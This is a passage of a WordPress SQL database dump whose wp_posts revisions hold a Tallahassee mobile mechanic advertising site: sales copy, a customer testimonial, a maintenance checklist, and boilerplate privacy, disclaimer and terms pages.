black;\">There are many vantages for using mobile mechanic vs. a conventional auto repair shop.</span></h3>\r\n<h3><span style=\"font-family: Georgia; color: black;\">The conventional factor of a mobile mechanic showing up at your home or place of business wins big time!</span></h3>\r\n<h3 style=\"orphans: auto; text-align: start; widows: auto; -webkit-text-stroke-width: 0px; word-spacing: 0px;\"><span style=\"color: #000000;\"><span style=\"font-family: Georgia; color: black;\">Especially when compared to waiting around all day, for your vehicle just to come inline to be look at for service.</span></span></h3>\r\n<h3 style=\"orphans: auto; text-align: start; widows: auto; -webkit-text-stroke-width: 0px; word-spacing: 0px;\"><span style=\"color: #000000;\"><span style=\"font-family: Georgia; color: black;\">Being able to do whatever you like at home or office while the dedicated mechanic performs the service task at hand, rather than having to wait at an auto repair service department is a great advantage &amp; gain for you!</span></span></h3>\r\n<h3></h3>\r\n<h3>With a mobile mechanic you are able to speak directly to the mechanic, about how to carry out any repair issues without delay; likewise, being able to meet at your place of business or at home.</h3>\r\n<h2><span style=\"color: #ff0000;\">Make an appointment for your <span style=\"text-decoration: underline;\">auto repairs</span> today!</span></h2>\r\n<h1>CALL US NOW:   <span class=\"number\">(813) 361-1384</span></h1>\r\n&nbsp;\r\n<h1 style=\"text-align: center;\">How It Works!</h1>\r\n<h2><span style=\"color: #ff0000;\">Requesting auto repairs is easy with The Mobile Mechanics.</span></h2>\r\n<h2><span style=\"color: #000000; font-family: arial, helvetica, sans-serif;\">If you know what the issue is we can help you with the purchase of the parts and give you a general estimate over the phone to what the cost should be.</span></h2>\r\n<h2><span style=\"color: #000000; font-family: arial, helvetica, sans-serif;\">If you do not know what the problem is then we can come over to where your vehicle is and perform a computer diagnostic service to trouble shoot and find the problems.</span></h2>\r\n<h2><span style=\"color: #000000; font-family: arial, helvetica, sans-serif;\">Our at home, office and roadside diagnostic service calls are around $75 which covers the time &amp; expenses to come out to diagnose your vehicle’s problems, and if we do the repair job at that same time then the diagnostics can be free “only charging for the first hour of labor” to fix the issues.</span></h2>\r\n<h2><span style=\"color: #000000; font-family: arial, helvetica, sans-serif;\">All work guaranteed! All you\'ve have to do is call or fill out the inquiry form on this website now.</span></h2>\r\n<h1></h1>\r\n<h3><strong>Broken Down Car Truck o<img class=\"alignleft wp-image-54 size-full\" title=\"Miami Florida The Mobile Mechanic \" src=\"http://www.miamifl.themobilemechanics.org/wp-content/uploads/2014/03/Miami-FL-Mobile-Mechanics.jpg\" alt=\"Miami FL Mobile Mechanics\" width=\"150\" height=\"150\" /></strong>r Van?</h3>\r\n<h2 style=\"text-align: center;\">Why Not Have The Auto Mechanic</h2>\r\n<h2 style=\"text-align: center;\">come to you!</h2>\r\n<h3 style=\"text-align: center;\">The Traveling “Auto Care Mechanic\" For <em>Car Maintenance</em> and <em>Auto Repair</em>.</h3>\r\n<h4>Hi ho hi-ho, you hopped into your car and it just won\'t go, and suddenly you think you need a tow!</h4>\r\n<h4>To get back on the road again “you may-not-need to call around for towing services, and auto repair shops “</h4>\r\n<h4>There is a new &amp; better way “just call your neighborhood mobile mechanic”.</h4>\r\n<h4></h4>\r\n<h3><iframe src=\"//www.youtube.com/embed/LjFLoOo-ViM?rel=0\" width=\"560\" height=\"315\" frameborder=\"0\"></iframe></h3>\r\n&nbsp;\r\n<h2><em>CALL US NOW: </em></h2>\r\n<h1><span class=\"number\">(813) 361-1384</span>\r\n<img class=\"alignright size-full wp-image-38\" src=\"http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/Mobile-Mechanic.jpg\" alt=\"Mobile-Mechanic\" width=\"150\" height=\"150\" /></h1>\r\n<a href=\"http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/Mechanic-auto-repair.jpg\"><img class=\"alignleft size-full wp-image-48\" src=\"http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/Mechanic-auto-repair.jpg\" alt=\"Mechanic-auto-repair\" width=\"300\" height=\"210\" /></a>", "Auto Repair Service", "", "inherit", "closed", "closed", "", "14-autosave-v1", "", "", "2015-02-05 12:24:24", "2015-02-05 17:24:24", "", "14", "http://tallahassee.themobilemechanics.org/14-autosave-v1/", "0", "revision", "", "0");
INSERT INTO `wp_posts` VALUES("107", "1", "2015-02-06 12:15:10", "2015-02-06 17:15:10", "<strong>A true story.</strong>\r\n<h3>I was racing around enjoying a Sunday drive in my new 1969 corvette convertible sports car (new to me) “got a great deal” from the dealer!</h3>\r\n<h3> All of a sudden “I heard noises” so I pulled over to the side of the road “hoping it was not the engine braking down.</h3>\r\n<h3>After looking under the hood, but not knowing what to look for I notice a church. So saying a small prayer “as I tried starting it would not start. So I said a longer prayer and this time it started right-up.</h3>\r\n<h3>Now knowing I should get the engine look-at, I started my way back home and again clack-clack-clack my modified V-8 engine power down.</h3>\r\n<h3> This time I was stuck in front of a hospital and needed<em> auto repair help</em>! I loved my car &amp; the great performance it provides and praying was not doing it this time.</h3>\r\n<h3> So force to look for help using my smart phone I googled “<em>car shops near me.</em>“</h3>\r\n<h3><a href=\"http://tallahassee.themobilemechanics.org/\"><img class=\"alignleft size-full wp-image-45\" src=\"http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/Roadside-assistance.jpg\" alt=\"Roadside-assistance\" width=\"221\" height=\"136\" /></a> Finding <em>auto shops open on Sunday</em> was not easy.</h3>\r\n<h3>After several calls <em>the on call mechanic</em> said I need to have the <em>car towed</em> in.</h3>\r\n<h3>I thought man this <em>auto repair</em> is going to cost me big time.</h3>\r\n<h3> Just between the insurance &amp; registration cost &amp; now this. My driving pleasures were going to be on-hold.</h3>\r\n<h3> So Googling for “<em>towing companies</em>” I saw this website “<strong>The Mobile Mechanics</strong> Auto Repair Service”.  <em>A car mechanic that comes to you;</em></h3>\r\n<h3>This is what I needed, road side assistance.</h3>\r\n<h3> <em>The mechanic</em> said he was <em>On the road</em> and <em>near me.</em></h3>\r\n<h3>With in a few minutes after showing up he diagnose the problem and it was the fuel pump.</h3>\r\n<h3>Long story short the <em>mobilemechanic </em>was able to pick one up and install it for me on the spot, all for less than a C-note.</h3>\r\n<h3>I thank him he gave me his card &amp;  recommend that I should consider having the fuel pump re-located, way back closer to the tank, as the fuel pump should be pushing gas rather than pulling it.</h3>\r\n<h3> A simple fix he said just a few more parts that I could order online to save big time, and one hour labor.  He wrote the parts needed &amp; a quote on the back of his card.</h3>\r\n<h3> A few weeks later I went back to the <em>dealer ware</em> I bought my corvette. Their <em>auto shop department</em> also said that it was a good idea about relocating the pump; &amp; gave me an estimate for twice the amount the mobile mechanic would do it for me.</h3>\r\n<h3> I ordered the parts online like the mobile mechanic guy suggested and scheduled the <em>at home car repair</em> to re-locate the fuel pump. Works fine ever since!</h3>\r\n<h3> Now I refer to him as <em>my mobile mechanic</em> to all my friends and family.</h3>\r\n<h3> Later I found out from the salesmen who sold me the corvette that this was the problem the previous owner was having. Probably why I got a good deal, you think?</h3>\r\n<h3> He wanted to buy the car back from me but no way – I love my new corvette.</h3>\r\n<h3> Car mechanics that come to your house, what a great idea!</h3>\r\n<h3> Drive in pleasure safely,</h3>\r\n<h3> Karin Alan</h3>\r\n<h3>The happy Sunday driver</h3>", "A true story", "", "inherit", "closed", "closed", "", "25-revision-v1", "", "", "2015-02-06 12:15:10", "2015-02-06 17:15:10", "", "25", "http://tallahassee.themobilemechanics.org/25-revision-v1/", "0", "revision", "", "0");
INSERT INTO `wp_posts` VALUES("112", "1", "2015-02-06 12:22:59", "2015-02-06 17:22:59", "<div class=\"post\">\r\n<h1 align=\"center\"><a href=\"http://tallahassee.themobilemechanics.org/\"><img class=\"aligncenter size-full wp-image-71\" src=\"http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/mobile-auto-repair.jpg\" alt=\"mobile auto repair tampa\" width=\"300\" height=\"199\" /></a></h1>\r\n<h1 align=\"center\"><b><i>Introducing the Mobile Mechanics</i></b></h1>\r\n<h1 align=\"center\"><b><i>who’s there to care</i></b></h1>\r\n<h1 align=\"center\"><b><i>\"for your Auto Repairs\"</i></b></h1>\r\n<h3>If your car – truck or van is keeping you home-bond “let the traveling mobile mechanic” come to the rescue and fix your broken-down vehicle on the spot.</h3>\r\n<h3>Many times mechanical issues are minor and may only require a few small parts to repair.</h3>\r\n<h3>Having your car – truck or van towed to an <i>auto shop</i> can be the big event of your day, in its self as getting there is half the battle.</h3>\r\n<h3>Once your vehicle is safely parked in a<i> <b>driveway or parking lot (</b>even</i> r<i>oadside) having </i>a <i>mobile mechanic “who is willing to come to your place” of business or home can </i>save you time and money; here’s how:</h3>\r\n<strong>YES <img class=\"alignnone wp-image-59\" title=\"Miami Auto Repair Shop\" src=\"http://www.miamifl.themobilemechanics.org/wp-content/uploads/2014/03/auto-repair-shops.jpg\" alt=\"Miami auto repair shops\" width=\"35\" height=\"34\" /> Instead of having an expansive <i>towing service take your auto away – you </i>save money when the mobile mechanic brings the <i>auto services </i>to your car.</strong>\r\n\r\n<strong>YES <img class=\"alignnone size-full wp-image-73\" src=\"http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/auto-repair-shops.jpg\" alt=\"auto repair shops\" width=\"35\" height=\"34\" /></strong><strong>not having to wait around at an auto repair shop – you save time.</strong>\r\n\r\n<strong>YES <img class=\"alignnone size-full wp-image-73\" src=\"http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/auto-repair-shops.jpg\" alt=\"auto repair shops\" width=\"35\" height=\"34\" /> an the auto mechanics with their traveling tool-box can fix most any repair issues on the spot,</strong>\r\n\r\n<strong>YES <img class=\"alignnone size-full wp-image-73\" src=\"http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/auto-repair-shops.jpg\" alt=\"auto repair shops\" width=\"35\" height=\"34\" /> by dealing direct with the mechanic performing the work – you save big time by skipping the middle man.</strong>\r\n\r\n<strong>YES <img class=\"alignnone wp-image-59 size-full\" title=\"Miami Auto Repair Shop\" src=\"http://www.miamifl.themobilemechanics.org/wp-content/uploads/2014/03/auto-repair-shops.jpg\" alt=\"auto repair shops\" width=\"35\" height=\"34\" /> by having control of the parts you can save when ordering on line and buying on sale.</strong>\r\n\r\n<strong>YES <img class=\"alignnone size-full wp-image-73\" src=\"http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/auto-repair-shops.jpg\" alt=\"auto repair shops\" width=\"35\" height=\"34\" /> by consulting on a regular bases with your mobile mechanic who knows your car truck or van can keep your autos in tip top shape.</strong>\r\n<h2><strong>YES <img class=\"alignnone size-full wp-image-73\" src=\"http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/auto-repair-shops.jpg\" alt=\"auto repair shops\" width=\"35\" height=\"34\" /> this is a better way “just call your neighborhood local mobile mechanic today”</strong></h2>\r\n<h1>. <span style=\"color: #333300;\">(813) 361-1384</span></h1>\r\n<h1>Your neighborhood mobile mechanic</h1>\r\n<h1>is there for all your auto care repairs!</h1>\r\n<img class=\"aligncenter wp-image-61 size-full\" title=\"The Mobile Mechanic Miami Florida\" src=\"http://www.miamifl.themobilemechanics.org/wp-content/uploads/2014/03/The-Mechanic-miami.png\" alt=\"The-Mechanic-miami\" width=\"300\" height=\"73\" />\r\n<p align=\"center\"><b><i>copyright protected 2014</i></b></p>\r\n<p align=\"center\"><a href=\"http://en.wikipedia.org/wiki/Auto_mechanic\" target=\"_blank\"><img class=\"alignnone wp-image-69 size-thumbnail\" title=\"The Mobile Mechanics Miami Florida\" src=\"http://www.themobilemechanics.org/tampafl/wp-content/uploads/2014/02/mobile-mechanics-150x150.jpg\" alt=\"mobile mechanics\" width=\"150\" height=\"150\" /></a></p>\r\n<p style=\"text-align: center;\"><strong>(813) 361-1384</strong></p>\r\n\r\n</div>", "for your auto repairs", "", "inherit", "closed", "closed", "", "70-revision-v1", "", "", "2015-02-06 12:22:59", "2015-02-06 17:22:59", "", "70", "http://tallahassee.themobilemechanics.org/70-revision-v1/", "0", "revision", "", "0");
INSERT INTO `wp_posts` VALUES("121", "1", "2015-02-06 21:52:59", "2015-02-07 02:52:59", "&nbsp;\r\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" width=\"585\">\r\n<h2><b><i><img class=\"alignleft size-full wp-image-38\" src=\"http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/Mobile-Mechanic.jpg\" alt=\"Mobile-Mechanic\" width=\"150\" height=\"150\" />Professional Auto Repair Mechanics</i></b></h2>\r\n<h2><b><i>Will Travail to Your Place of Business - your home or office for Regular Scheduled Check-Ups!</i></b></h2>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1 align=\"center\"></h1>\r\n<h1 align=\"center\"><i>Keep On Trucking with Basic Regular</i></h1>\r\n<h1 align=\"center\"><i>Check-ups with benefits</i></h1>\r\n<h1 style=\"text-align: center;\"><em>Mobile Auto Repair</em></h1>\r\n<span style=\"color: #888888;\"><i>By TheMobileMechanics.org  </i></span>\r\n<h3> <span style=\"text-decoration: underline;\">Keep your car truck or van in tips top condition</span> with regular scheduled maintenance by following the owner\'s manual and a check-list of preventive maintenance <b>“will make your vehicles last longer and fuel efficient”.</b></h3>\r\n<h3><b> </b>It is important “<b>to have regular check-ups” </b>to protect engine performance; <b><i>here is a list of useful tips for maintaining your car’s engine:</i></b></h3>\r\n&nbsp;\r\n\r\n<a href=\"http://themobilemechanics.org/\"><img class=\"alignnone wp-image-41 size-thumbnail\" src=\"http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/Mobile-auto-maintenance-150x150.jpeg\" alt=\"Mobile auto repair and maintenance\" width=\"150\" height=\"150\" /></a>\r\n<h2><b>Preventive</b><b> Maintenance Schedule</b></h2>\r\n<h2></h2>\r\n<h2><b>Checklist: </b></h2>\r\n&nbsp;\r\n\r\nI.     <b>On average every “One Thousand miles” have a routine vehicle maintenance inspection</b>\r\n<ul>\r\n	<li>1) Engine motor oil</li>\r\n	<li>2) Coolant fluid; always check the engine compartment for any signs of leaks</li>\r\n	<li>3) Transmission fluid</li>\r\n	<li>4) Brake fluid</li>\r\n	<li>5) Check tire pressure</li>\r\n	<li>6) Inspect belts and hoses (frayed or cracked taking it for granted can create serious engine problems)</li>\r\n	<li>7) Inspect brake - replace if needed</li>\r\n	<li>8) Inspect suspension</li>\r\n	<li>9) Battery inspection</li>\r\n	<li>10)*Check all other fluids in the engine and add replace as needed (fluids are important).</li>\r\n</ul>\r\nII       <b>Every “Three Thousand miles” - vehicle preventive maintenance</b>\r\n<ul>\r\n	<li>1) Change oil; (a primary engine maintenance tips is to change the engine oil along with the filter.</li>\r\n</ul>\r\nthis will ensure proper lubrication and performance of the engine)\r\n<ul>\r\n	<li>2) Lubricate chassis\' key joints.</li>\r\n</ul>\r\nIII      <b>Every “Six Thousand miles”</b>\r\n<ul>\r\n	<li>1) Rotate tires to keep the road handling performance healthy.</li>\r\n</ul>\r\nIV      <b>Every “Twelve Thousand” - scheduled vehicle maintenance</b>\r\n<ul>\r\n	<li>1) Flush radiator, replace anti-freeze</li>\r\n	<li>2) Replace air filters.</li>\r\n</ul>\r\nV       <b>Every Twenty Four Thousand miles - Tune Up Checklist</b>\r\n<ul>\r\n	<li>1) Replace spark plugs; be wary of spark plugs that are beyond the recommended 30,000-mile range</li>\r\n	<li>2) Change transmission fluid, filter and pan gasket.</li>\r\n</ul>\r\nVI      <b>Every “Thirty Thousand Miles” - preventative car maintenance</b>\r\n<ul>\r\n	<li>1) Check and test ignition wires (replace if needed)</li>\r\n	<li>2) Test cooling system and heating hoses (replace repair if needed)</li>\r\n	<li>3) Replace fluid in differential and manual transmission.</li>\r\n</ul>\r\n&nbsp;\r\n<h3> Following the guidelines of your owner\'s vehicle maintenance booklet is the key to keeping your car - truck or van “going for as long as possible”.</h3>\r\n<h3> Each automobile is as different as so their drivers. Putting a little extra money into your vehicle “often times pays off” in the long-run.  (It won\'t last long if you definitely don\'t care.)</h3>\r\n<h3> Wax it often, treat it like a baby, don\'t ride your brakes, <span style=\"text-decoration: underline;\">avoid burning rubber</span> - unless you’re racing or impressing the guys &amp; dalls!</h3>\r\n<h3><b> </b><i><span style=\"text-decoration: underline;\">The Traveling Mobile Mechanics for all your premium mobile auto repair &amp; care needs</span></i><span style=\"text-decoration: underline;\"> today!</span></h3>\r\n<h1></h1>\r\n<h2 style=\"text-align: center;\">Get the premium mobile auto repair &amp; care service from your neighborhood mechanic by calling</h2>\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h2 style=\"text-align: center;\"><b> <span class=\"number\">(813) 361-1384</span> Today!</b></h2>\r\n<h1 style=\"text-align: center;\"><img class=\"aligncenter size-full wp-image-42\" src=\"http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/The-Mechanic-Logo-300x73.png\" alt=\"The-Mechanic-Logo-300x73\" width=\"300\" height=\"73\" /></h1>\r\n<h1 style=\"text-align: center;\"> <strong><span style=\"text-decoration: underline;\">Mobile Auto Repair</span></strong></h1>\r\n<h2 style=\"text-align: center;\"><span class=\"number\">(813) 361-1384</span></h2>\r\n<p align=\"center\"><b><i>copyright protected</i></b></p>\r\n<a href=\"http://tallahassee.themobilemechanics.org/\"><img class=\"aligncenter size-full wp-image-43\" src=\"http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/mobile-mechanics-150x150.jpg\" alt=\"mobile-mechanics-150x150\" width=\"150\" height=\"150\" /></a>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\">The above mechanic(s) &amp; the mobile mechanic\'s business</span></p>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"> is individually owned and operated.</span></p>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\">TheMobileMechanics.org is an advertising agent</span></p>", "Preventive Maintenance Schedule", "", "inherit", "closed", "closed", "", "27-revision-v1", "", "", "2015-02-06 21:52:59", "2015-02-07 02:52:59", "", "27", "http://tallahassee.themobilemechanics.org/27-revision-v1/", "0", "revision", "", "0");
INSERT INTO `wp_posts` VALUES("122", "1", "2015-02-06 21:57:24", "2015-02-07 02:57:24", "<div id=\"content\">\r\n\r\nThis website and its content is copyright of TheMobileMechanics.org (an advertising agent) - © TheMobileMechanics.org (an advertising agent) 2015. All rights reserved.\r\n\r\nAny redistribution or reproduction of part or all of the contents in any form is prohibited other than the following:\r\n<ul>\r\n	<li>You may print or download to a local hard disk extracts for your personal and non-commercial use only.</li>\r\n	<li>You may copy the content to individual third parties for their personal use, but only if you acknowledge the website as the source of the material</li>\r\n</ul>\r\nYou may not, except with our express written permission, distribute or commercially exploit the content. Nor may you transmit it or store it in any other website or other form of electronic retrieval system.\r\n\r\n</div>", "Copyright", "", "inherit", "closed", "closed", "", "55-revision-v1", "", "", "2015-02-06 21:57:24", "2015-02-07 02:57:24", "", "55", "http://tallahassee.themobilemechanics.org/55-revision-v1/", "0", "revision", "", "0");
INSERT INTO `wp_posts` VALUES("123", "1", "2015-02-06 21:58:23", "2015-02-07 02:58:23", "<h1>Privacy Policy Statement</h1>\r\nWe can be reached via e-mail at <b>support@themobilemechanics.org</b>\r\n\r\nThis privacy policy sets out how TheMobileMechanics.org (an advertising agent) uses and protects any information that you give TheMobileMechanics.org (an advertising agent) when you use this website.\r\n\r\nTheMobileMechanics.org (an advertising agent) is committed to ensuring that your privacy is protected. Should we ask you to provide certain information by which you can be identified when using this website, then you can be assured that it will only be used in accordance with this privacy statement.\r\n\r\nTheMobileMechanics.org (an advertising agent) may change this policy from time to time by updating this page. You should check this page from time to time to ensure that you are happy with any changes.\r\n<h2>What We Collect</h2>\r\nFor each visitor to our Web page, our Web server automatically recognizes the domain name and e-mail address of the consumer (where possible).\r\n\r\nWe collect the e-mail addresses of those who communicate with us via e-mail, payment information (e.g., credit card number and billing address).\r\n\r\nWe may collect the following information:\r\n<ul>\r\n	<li>Name and job title</li>\r\n	<li>Contact information including email address</li>\r\n	<li>Demographic information such as postcode, preferences and interests</li>\r\n	<li>Other information relevant to customer surveys and/or offers</li>\r\n</ul>\r\n<h2>What We Do With The Information We Gather</h2>\r\nWe require this information to understand your needs and provide you with a better service, and in particular for the following reasons:\r\n<ul>\r\n	<li>Internal record keeping.</li>\r\n	<li>We may use the information to improve our products and services.</li>\r\n	<li>We may periodically send promotional emails about new products, special offers or other information which we think you may find interesting using the email address which you have provided.</li>\r\n	<li>From time to time, we may also use your information to contact you for market research purposes. We may contact you by email, phone, fax or mail. We may use the information to customise the website according to your interests.</li>\r\n</ul>\r\n<h2>Security</h2>\r\nWe are committed to ensuring that your information is secure. In order to prevent unauthorised access or disclosure, we have put in place suitable physical, electronic and managerial procedures to safeguard and secure the information we collect online.\r\n<h2>How We Use Cookies</h2>\r\nA cookie is a small file which asks permission to be placed on your computer. Once you agree, the file is added and the cookie helps analyse web traffic or lets you know when you visit a particular site. Cookies allow web applications to respond to you as an individual. The web application can tailor its operations to your needs, likes and dislikes by gathering and remembering information about your preferences.\r\n\r\nWe may use traffic log cookies to identify which pages are being used. This helps us analyse data about web page traffic and improve our website in order to tailor it to customer needs. We only use this information for statistical analysis purposes and then the data is removed from the system.\r\n\r\nOverall, cookies help us provide you with a better website, by enabling us to monitor which pages you find useful and which you do not. A cookie in no way gives us access to your computer or any information about you, other than the data you choose to share with us.  You can choose to accept or decline cookies. Most web browsers automatically accept cookies, but you can usually modify your browser setting to decline cookies if you prefer. This may prevent you from taking full advantage of the website.\r\n<h2>Links To Other Websites</h2>\r\nOur website may contain links to other websites of interest. However, once you have used these links to leave our site, you should note that we do not have any control over that other website. Therefore, we cannot be responsible for the protection and privacy of any information which you provide whilst visiting such sites and such sites are not governed by this privacy statement. You should exercise caution and look at the privacy statement applicable to the website in question.\r\n<h2>Controlling Y&gt;our Personal Information</h2>\r\nYou may choose to restrict the collection or use of your personal information in the following ways:\r\n<ul>\r\n	<li>Whenever you are asked to fill in a form on the website, look for the box that you can click to indicate that you do not want the information to be used by anybody for direct marketing purposes.</li>\r\n	<li>If you have previously agreed to us using your personal information for direct marketing purposes,  you may change your mind at any time by writing to or emailing us at <b>support@themobilemechanics.org</b>.</li>\r\n</ul>\r\nWe will not sell, distribute or lease your personal information to third parties unless we have your permission or are required by law to do so. We may use your personal information to send you promotional information about third parties which we think you may find interesting if you tell us that you wish this to happen.\r\n\r\nYou may request details of personal information which we hold about you as governed by the laws of 0. A small fee may be payable. If you would like a copy of the information held on you please write to .\r\n\r\nIf you believe that any information we are holding on you is incorrect or incomplete, please write to or email us as soon as possible, at the above address. We will promptly correct any information found to be incorrect.", "Privacy", "", "inherit", "closed", "closed", "", "57-revision-v1", "", "", "2015-02-06 21:58:23", "2015-02-07 02:58:23", "", "57", "http://tallahassee.themobilemechanics.org/57-revision-v1/", "0", "revision", "", "0");
INSERT INTO `wp_posts` VALUES("124", "1", "2015-02-06 21:59:05", "2015-02-07 02:59:05", "<div id=\"content\">\r\n<h1>Disclaimer</h1>\r\nIndividually Owned and Operated\r\n\r\nThe information contained in this website is for general information purposes only.\r\n\r\nThe information is provided by <b>TheMobileMechanics.org (an advertising agent)</b> and while we endeavour to keep the information up to date and correct, we make no representations or warranties of any kind, express or implied, about the completeness, accuracy, reliability, suitability or availability with respect to the individual mechanic, website or the information, products, services, or related graphics contained on the website for any purpose. Each and every mobile mechanic &amp; the mechanic\'s privately owned business is individually owned and operated.\r\n\r\nAny reliance you place on such information is therefore strictly at your own risk.\r\n\r\nIn no event will we be liable for any loss or damage including without limitation, indirect or consequential loss or damage, or any loss or damage whatsoever arising from loss of data or profits arising out of, or in connection with, the individually mechanic(s)  and this websitec.\r\n\r\nThrough this website you are able to employ a mechanic which is not under the control of  <b>TheMobileMechanics.org (an advertising agent)</b>. We have no control over the nature, content, skills and availability of the mechanic(s). The inclusion of any links does not necessarily imply a recommendation or endorse the views expressed within them.\r\n\r\nEvery effort is made to keep the website up and running smoothly. However, beyond our control  <b>TheMobileMechanics.org (an advertising agent)</b> takes no responsibility for, and will not be liable for, the privately owned mechanic\'s business and the individually mechanic.\r\n\r\n</div>", "Disclaimer", "", "inherit", "closed", "closed", "", "59-revision-v1", "", "", "2015-02-06 21:59:05", "2015-02-07 02:59:05", "", "59", "http://tallahassee.themobilemechanics.org/59-revision-v1/", "0", "revision", "", "0");
INSERT INTO `wp_posts` VALUES("125", "1", "2015-02-06 21:59:43", "2015-02-07 02:59:43", "<div id=\"content\">\r\n<h1>Terms &amp; Conditions</h1>\r\nWelcome to our website. If you continue to browse and use this website, you are agreeing to comply with and be bound by the following terms and conditions of use, which together with our privacy policy govern the relationship between TheMobileMechanics.org (an advertising agent) and you in relation to this website. If you disagree with any part of these terms and conditions, please do not use our website.\r\n\r\nThe term <b>\"TheMobileMechanics.org (an advertising agent)\"</b> or \"us\" or \"we\" refers to the owner of the website. The term \"you\" refers to the user or viewer of our website.\r\n<h2>Use of This Web Site</h2>\r\nThe use of this website is subject to the following terms of use:\r\n<ul>\r\n	<li>The content of the pages of this website is for your general information and use only. It is subject to change without notice.</li>\r\n	<li>This website may use cookies to monitor browsing preferences. If you do allow cookies to be used, please refer to our privacy policy for details of what data we may collect and how it may be used.</li>\r\n	<li>Neither we nor any third parties provide any warranty or guarantee as to the accuracy, timeliness, performance, completeness or suitability of the information and materials found or offered on this website for any particular purpose. You acknowledge that such information and materials may contain inaccuracies or errors and we expressly exclude liability for any such inaccuracies or errors to the fullest extent permitted by law.</li>\r\n	<li>Your use of any information or materials on this website is entirely at your own risk, for which we shall not be liable.  It shall be your own responsibility to ensure that any products, services or information available through this website meet your specific requirements.</li>\r\n	<li>This website contains material which is owned by or licensed to us. This material includes, but is not limited to, the design, layout, look, appearance and graphics. Reproduction is prohibited other than in accordance with the copyright notice, which forms part of these terms and conditions.</li>\r\n	<li>All trademarks reproduced in this website, which are not the property of, or licensed to the operator, are acknowledged on the website.</li>\r\n	<li>Unauthorised use of this website may give rise to a claim for damages and/or be a criminal offence.</li>\r\n	<li>From time to time, this website may also include links to other websites. These links are provided for your convenience to provide further information. They do not signify that we endorse the website(s). We have no responsibility for the content of the linked website(s).</li>\r\n</ul>\r\n</div>", "Terms & Conditions", "", "inherit", "closed", "closed", "", "58-revision-v1", "", "", "2015-02-06 21:59:43", "2015-02-07 02:59:43", "", "58", "http://tallahassee.themobilemechanics.org/58-revision-v1/", "0", "revision", "", "0");
INSERT INTO `wp_posts` VALUES("128", "1", "2015-02-07 16:28:17", "2015-02-07 21:28:17", "         <h1>Earnings Dislaimer</h1>\n      \n      Any earnings or income statements, or earnings or income examples, are only estimates of what we think you could earn. there is no assurance you will do as well. If you rely upon our figures, you must accept the risk of not doing as well.\n\n      Where specific income figures are used, and attributed to an individual or business, those persons or businesses have earned that amount. There is no assurance you will do as well. If you rely upon our figures; you must accept the risk of not doing as well.\n\n      Any and all claims or representations, as to income earnings on this web site, are not to be considered as average earnings.\n\n      There can be no assurance that any prior successes, or past results, as to income earnings, can be used as an indication of your future success or results.\n\n      <h2>Income Disclaimer</h2>\n\n      This website and the items it distributes contain business strategies, marketing methods and other business advice that, regardless of my own results and experience, may not produce the same results (or any results) for you. Business Name makes absolutely no guarantee, expressed or implied, that by following the advice or content available from this web site you will make any money or improve current profits, as there are several factors and variables that come into play regarding any given business.\n\n      Primarily, results will depend on the nature of the product or business model, the conditions of the marketplace, the experience of the individual, and situations and elements that are beyond your control.\n\n      As with any business endeavour, you assume all risk related to investment and money based on your own discretion and at your own potential expense.\n\n      <h2>Liability Disclaimer</h2>\n\n      By reading this website or the documents it offers, you assume all risks associated with using the advice given, with a full understanding that you, solely, are responsible for anything that may occur as a result of putting this information into action in any way, and regardless of your interpretation of the advice.\n\n      You further agree that our company cannot be held responsible in any way for the success or failure of your business as a result of the information provided by our company. It is your responsibility to conduct your own due diligence regarding the safe and successful operation of your business if you intend to apply any of our information in any way to your business operations.\n\n      In summary, you understand that we make absolutely no guarantees regarding income as a result of applying this information, as well as the fact that you are solely responsible for the results of any action taken on your part as a result of any given information.\n\n      In addition, for all intents and purposes you agree that our content is to be considered &quot;for entertainment purposes only.&quot; Always seek the advice of a professional when making financial, tax or business decisions.", "Earnings", "", "inherit", "closed", "closed", "", "56-revision-v1", "", "", "2015-02-07 16:28:17", "2015-02-07 21:28:17", "", "56", "http://tallahassee.themobilemechanics.org/56-revision-v1/", "0", "revision", "", "0");
INSERT INTO `wp_posts` VALUES("130", "1", "2015-02-07 22:02:09", "2015-02-08 03:02:09", "<em><span style=\"color: #ff0000;\"><span style=\"font-size: 2em; line-height: 1.5em;\">“Tallahassee Mobile Auto Repair - Greased Lighting  Service ”</span></span></em>\r\n<h2>Mobile Auto Repair Mechanics in Tallahassee Florida are now available for car repairs at home or your place of business even roadside emergency repairs.</h2>\r\n<h2>For your convenience we can now send auto mechanics straight to your home, office or place of business to fix your car - truck or van to ware you are.</h2>\r\n<h2>For the best A.O.K. Mobile Mechanics in Tallahassee FL call your \"Tallahassee<strong> Mobile Mechanic\"</strong> at -</h2>\r\n<h2><span style=\"font-size: 2em; line-height: 1.5em;\">CALL US NOW: *<span class=\"number\" style=\"color: #333300;\">(813) 361-1384</span></span></h2>\r\n<h2></h2>\r\n<a href=\"http://tallahassee.themobilemechanics.org/\"><img class=\"alignleft size-full wp-image-48\" src=\"http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/Mechanic-auto-repair.jpg\" alt=\"Mechanic-auto-repair\" width=\"300\" height=\"210\" /></a>\r\n<h3><span style=\"font-family: Georgia; color: black;\">There are many vantages for using mobile mechanic vs. a conventional auto repair shop.</span></h3>\r\n<h3><span style=\"font-family: Georgia; color: black;\">The conventional factor of a mobile mechanic showing up at your home or place of business wins big time!</span></h3>\r\n<h3 style=\"orphans: auto; text-align: start; widows: auto; -webkit-text-stroke-width: 0px; word-spacing: 0px;\"><span style=\"color: #000000;\"><span 